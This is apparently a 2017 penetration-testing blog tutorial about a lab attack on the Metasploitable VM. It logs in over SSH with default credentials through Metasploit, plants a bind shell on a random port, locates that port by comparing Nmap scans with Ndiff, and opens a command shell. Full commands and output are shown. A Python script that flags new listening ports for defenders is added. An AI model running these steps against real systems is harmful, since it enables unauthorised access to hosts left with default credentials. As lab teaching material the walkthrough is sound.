Wednesday, September 6, 2017
HACK THE PLANET ! :)
Finding shell_bind_tcp_random_port with Nmap and Ndiff
Metasploitable
We're using Metasploitable for our vulnerable host. Just boot up the VM with host-only networking enabled, and you should be good to go. In this case, Metasploitable is at 172.16.126.129.

Nmap
First, we need to get a list of open ephemeral ports using Nmap. An ephemeral port is just a port that the OS assigns automatically and temporarily when a program asks for "any port". Our payload will bind to one of these ports. We use a little shell magic to parse the ephemeral port range in /proc/sys/net/ipv4/ip_local_port_range and feed it to Nmap: the file holds the lower and upper bound separated by a tab, and sed turns that tab into a dash, giving the port range spec Nmap expects. We also need to save the scan results to before.xml in order to use Ndiff later.

root@kharak:~# nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX before.xml --open --send-ip 172.16.126.129

Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 11:59 CST
Initiating SYN Stealth Scan at 11:59
Scanning 172.16.126.129 [28233 ports]
Discovered open port 33395/tcp on 172.16.126.129
Discovered open port 47431/tcp on 172.16.126.129
Discovered open port 49712/tcp on 172.16.126.129
Discovered open port 51488/tcp on 172.16.126.129
Completed SYN Stealth Scan at 11:59, 0.31s elapsed (28233 total ports)
Nmap scan report for 172.16.126.129
Host is up (0.00014s latency).
Not shown: 28229 closed ports
PORT      STATE SERVICE
33395/tcp open  unknown
47431/tcp open  unknown
49712/tcp open  unknown
51488/tcp open  unknown
MAC Address: 00:0C:29:3D:5A:9B (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)
As you can see, ports {33395,47431,49712,51488}/tcp are open in the ephemeral port range.

Metasploit
Next, we need to exploit the system. We're using exploit/multi/ssh/sshexec here, since we know that Metasploitable has SSH open with default creds msfadmin:msfadmin. Make sure to use the payload linux/x86/shell_bind_tcp_random_port. That's why we're here, right? :)

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > setg RHOST 172.16.126.129
RHOST => 172.16.126.129
msf exploit(sshexec) > set USERNAME msfadmin
USERNAME => msfadmin
msf exploit(sshexec) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf exploit(sshexec) > set PAYLOAD linux/x86/shell_bind_tcp_random_port
PAYLOAD => linux/x86/shell_bind_tcp_random_port
msf exploit(sshexec) > exploit
[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress - 38.67% done (268/693 bytes)
[*] Command Stager progress - 100.00% done (693/693 bytes)
We won't get a session from this: the payload picks its own listening port, so Metasploit has no way of knowing which port to connect to (that is the nature of this payload).
Nmap and Ndiff
Almost there! Now we need to scan the host again to get the new state of open ephemeral ports. We save the results to after.xml. After that, we run Ndiff on before.xml and after.xml, which reveals the port our bind shell is listening on. (The ^before^after at the prompt is bash history substitution: it reruns the previous command with the first occurrence of "before" replaced by "after".)

root@kharak:~# ^before^after
nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX after.xml --open --send-ip 172.16.126.129

Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 12:00 CST
Initiating SYN Stealth Scan at 12:00
Scanning 172.16.126.129 [28233 ports]
Discovered open port 51488/tcp on 172.16.126.129
Discovered open port 49712/tcp on 172.16.126.129
Discovered open port 33395/tcp on 172.16.126.129
Discovered open port 47431/tcp on 172.16.126.129
Discovered open port 36503/tcp on 172.16.126.129
Completed SYN Stealth Scan at 12:01, 0.27s elapsed (28233 total ports)
Nmap scan report for 172.16.126.129
Host is up (0.00012s latency).
Not shown: 28228 closed ports
PORT      STATE SERVICE
33395/tcp open  unknown
36503/tcp open  unknown
47431/tcp open  unknown
49712/tcp open  unknown
51488/tcp open  unknown
MAC Address: 00:0C:29:3D:5A:9B (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)

root@kharak:~# ndiff {before,after}.xml
-Nmap 6.00 scan initiated Thu Jan 02 11:59:37 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX before.xml --open --send-ip 172.16.126.129
+Nmap 6.00 scan initiated Thu Jan 02 12:00:59 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX after.xml --open --send-ip 172.16.126.129

 172.16.126.129, 00:0C:29:3D:5A:9B:
-Not shown: 28229 closed ports
+Not shown: 28228 closed ports
 PORT      STATE SERVICE VERSION
+36503/tcp open
Our bind shell is on port 36503/tcp!
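The same before/after comparison is also a useful baseline check from the other side of the wire: a listener that shows up in the ephemeral range between two scans of your own host, and that no service accounts for, is exactly the footprint a bind-to-random-port payload leaves behind. Below is an added example (not code from the original post or from the Nmap project) that does the part of Ndiff's job used here with nothing but the Python standard library: it parses two Nmap XML reports, lists ports that opened or closed per host, and flags new TCP listeners that fall inside the kernel's ephemeral range, parsed from the contents of ip_local_port_range the same way the sed one-liner does. The two XML documents are constructed inline in Nmap's output format using the addresses and ports from the scans above; the function names are my own.

```python
"""Diff two Nmap XML reports and flag newly opened ephemeral listeners.

Added example: a stdlib-only stand-in for the part of Ndiff used in the
post (which ports changed state), plus a parser for the kernel's
ip_local_port_range file equivalent to the sed 's/\\t/-/' one-liner.
"""
import xml.etree.ElementTree as ET


# Constructed sample data modelled on Nmap's XML schema (nmaprun/host/ports/
# port/state). The address and ports are the ones from the post's scans;
# the remaining attributes are filler.
def _nmap_xml(outfile, open_ports, closed_count):
    port_elems = "\n".join(
        f'<port protocol="tcp" portid="{p}"><state state="open" reason="syn-ack"/>'
        f'<service name="unknown" method="table"/></port>'
        for p in open_ports
    )
    return f"""<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p 32768-61000 -oX {outfile} 172.16.126.129" version="6.00">
<host><status state="up" reason="arp-response"/>
<address addr="172.16.126.129" addrtype="ipv4"/>
<address addr="00:0C:29:3D:5A:9B" addrtype="mac" vendor="VMware"/>
<ports><extraports state="closed" count="{closed_count}"/>
{port_elems}
</ports></host>
</nmaprun>"""


BEFORE_XML = _nmap_xml("before.xml", [33395, 47431, 49712, 51488], 28229)
AFTER_XML = _nmap_xml("after.xml", [33395, 36503, 47431, 49712, 51488], 28228)


def ephemeral_range(proc_text):
    """Parse the contents of /proc/sys/net/ipv4/ip_local_port_range
    (e.g. "32768\\t61000\\n") into an (low, high) tuple of ints."""
    low, high = proc_text.split()
    return int(low), int(high)


def nmap_port_spec(proc_text):
    """Same transformation as sed 's/\\t/-/' on that file, e.g. "32768-61000"."""
    low, high = ephemeral_range(proc_text)
    return f"{low}-{high}"


def open_ports(xml_text):
    """Return {ipv4_address: {(protocol, port), ...}} for every port Nmap
    reported as open. Only the XML produced by your own scans should be fed
    in here; ElementTree is not hardened against hostile XML."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addrs = [a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"]
        if not addrs:
            continue
        ports = set()
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                ports.add((port.get("protocol"), int(port.get("portid"))))
        result[addrs[0]] = ports
    return result


def diff_scans(before_xml, after_xml):
    """Per host: ports open only in the second scan ("opened") and ports open
    only in the first ("closed"). A host missing from one scan counts as
    having no open ports in that scan, so its changes still show up."""
    before = open_ports(before_xml)
    after = open_ports(after_xml)
    report = {}
    for addr in sorted(set(before) | set(after)):
        b = before.get(addr, set())
        a = after.get(addr, set())
        report[addr] = {"opened": sorted(a - b), "closed": sorted(b - a)}
    return report


def new_ephemeral_listeners(before_xml, after_xml, proc_text):
    """Newly opened TCP ports inside the kernel's ephemeral range: the pattern
    a bind-to-random-port payload produces, and what a baseline check should
    raise for review. Returns {address: [port, ...]}."""
    low, high = ephemeral_range(proc_text)
    flagged = {}
    for addr, change in diff_scans(before_xml, after_xml).items():
        hits = [p for proto, p in change["opened"] if proto == "tcp" and low <= p <= high]
        if hits:
            flagged[addr] = hits
    return flagged


if __name__ == "__main__":
    proc = "32768\t61000\n"  # constructed: the proc file's contents on this kernel
    print("nmap -p", nmap_port_spec(proc))
    for addr, change in diff_scans(BEFORE_XML, AFTER_XML).items():
        for proto, p in change["opened"]:
            print(f"+{p}/{proto} open on {addr}")
        for proto, p in change["closed"]:
            print(f"-{p}/{proto} closed on {addr}")
    print("new ephemeral listeners:", new_ephemeral_listeners(BEFORE_XML, AFTER_XML, proc))
```

Run against the two reports above it prints a single `+36503/tcp open on 172.16.126.129` line, the same answer Ndiff gave; pointed at `-oX` output from periodic scans of a host you administer, the `new_ephemeral_listeners` result is the list worth correlating against `ss -ltnp` on the box itself.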
Metasploit
Finally, we can pop a shell with exploit/multi/handler. Just set PAYLOAD to linux/x86/shell_bind_tcp, LPORT to the port you found with Ndiff, and hit exploit! We already set RHOST globally when we used exploit/multi/ssh/sshexec. :)

msf exploit(sshexec) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(handler) > set LPORT 36503
LPORT => 36503
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (172.16.126.1:41368 -> 172.16.126.129:36503) at 2014-01-02 12:01:39 -0600
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
And there you have it! We got a shell. :D
Conclusion
If you're new to Metasploit and want to try your hand at some awesome hax, you can download it here. Hack the planet!